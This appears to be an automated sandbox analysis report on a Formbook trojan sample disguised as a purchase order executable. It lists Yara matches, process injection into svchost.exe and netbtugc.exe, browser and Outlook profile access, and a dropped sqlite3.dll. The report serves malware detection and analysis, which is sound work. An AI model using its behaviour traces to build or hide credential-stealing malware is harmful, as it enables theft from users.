Source: Yara match	File source: 00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: PO #86637.exe, 00000000.00000002.358302032.0000000001245000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5e098468-5
Source: PO #86637.exe, 00000000.00000002.358302032.0000000001245000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3ab03123-8
Source: PO #86637.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7a2c577e-5
Source: PO #86637.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_099f17b7-7

Source: C:\Users\user\Desktop\PO #86637.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: sqlite3.dll.4.dr

Static PE information: Number of sections : 18 > 10

Source: PO #86637.exe, 00000000.00000002.358251944.0000000000A32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs PO #86637.exe
Source: PO #86637.exe, 00000000.00000003.352856218.0000000002EAD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO #86637.exe
Source: PO #86637.exe, 00000000.00000003.352639496.0000000003030000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO #86637.exe

Source: C:\Windows\SysWOW64\netbtugc.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: PO #86637.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/11@16/13

Source: C:\Users\user\Desktop\PO #86637.exe

File created: C:\Users\user\AppData\Local\Temp\aut2617.tmp

Jump to behavior

Source: PO #86637.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\netbtugc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO #86637.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: netbtugc.exe, 00000004.00000002.754364885.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: PO #86637.exe	ReversingLabs: Detection: 39%
Source: PO #86637.exe	Virustotal: Detection: 29%

Source: unknown	Process created: C:\Users\user\Desktop\PO #86637.exe "C:\Users\user\Desktop\PO #86637.exe"
Source: C:\Users\user\Desktop\PO #86637.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #86637.exe"
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO #86637.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #86637.exe"	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO #86637.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

File opened: C:\Windows\SysWOW64\RichEd32.dll

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PO #86637.exe

Static file information: File size 1190400 > 1048576

Source: PO #86637.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO #86637.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO #86637.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO #86637.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO #86637.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO #86637.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PO #86637.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fhSlYsGoxBSrK.exe, 00000003.00000000.375903357.000000000036E000.00000002.00000001.01000000.00000004.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000000.408609838.000000000036E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdb source: PO #86637.exe, 00000000.00000003.352454555.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.352557535.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.373172242.0000000000280000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.373908133.0000000000460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.394555757.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.394555757.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.753552553.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.394436755.0000000000520000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.753552553.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.394786162.0000000000730000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.394520672.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000003.00000002.753396697.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.753387034.000000000044A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.753781292.00000000011FC000.00000004.10000000.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000000.409175143.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.477475123.00000000006AC000.00000004.80000000.00040000.00000000.sdmp

Source: PO #86637.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO #86637.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO #86637.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO #86637.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO #86637.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: sqlite3.dll.4.dr	Static PE information: section name: /4
Source: sqlite3.dll.4.dr	Static PE information: section name: /19
Source: sqlite3.dll.4.dr	Static PE information: section name: /31
Source: sqlite3.dll.4.dr	Static PE information: section name: /45
Source: sqlite3.dll.4.dr	Static PE information: section name: /57
Source: sqlite3.dll.4.dr	Static PE information: section name: /70
Source: sqlite3.dll.4.dr	Static PE information: section name: /81
Source: sqlite3.dll.4.dr	Static PE information: section name: /92

Source: C:\Windows\SysWOW64\netbtugc.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Jump to dropped file

Source: C:\Users\user\Desktop\PO #86637.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #86637.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
